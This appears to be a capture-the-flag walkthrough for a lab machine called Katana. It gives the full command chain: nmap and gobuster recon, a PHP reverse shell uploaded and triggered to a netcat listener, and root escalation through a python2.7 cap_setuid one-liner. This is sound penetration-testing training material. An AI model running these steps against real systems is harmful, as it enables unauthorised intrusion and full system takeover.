Katana Machine - Walkthrough
1. Reconnaissance
Run Nmap scan to discover open ports and services.
nmap -sC -sV -p- [TARGET_IP]
Notable open ports:
-
FTP (port 21)
-
SSH (port 22)
-
HTTP (port 80)
-
Samba (port 139, 445)
-
LiteSpeed HTTP (port 8088)
-
Nginx HTTP (port 8715)
2. Exploring HTTP Services
Start by browsing port 80. No useful information found.
Proceed with brute-forcing hidden directories using Gobuster.
gobuster dir -k -u http://[TARGET_IP]:8088/ -w /usr/share/wordlists/dirb/common.txt -x html,php
Interesting directories:
/upload.html
: File upload page.
3. Gaining Foothold
Upload a PHP reverse shell using pentestmonkey’s script.
Once uploaded, check the redirection on port 8715 for the shell file.
Start a netcat listener and trigger the reverse shell.
nc -nlvp 4444
curl http://[TARGET_IP]:8715/katana_shell.php
Once connected, upgrade to a stable shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
First flag: /var/www/local.txt
.
4. Privilege Escalation
Check for SUID binaries using getcap.
/sbin/getcap -r / 2>/dev/null
Found that Python 2.7 has cap_setuid+ep
.
Use GTFOBins technique to escalate privileges:
python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Now you have root access. Retrieve the final flag:
cat /root/proof.txt
5. Flags
-
User flag:
/var/www/local.txt
-
Root flag:
/root/proof.txt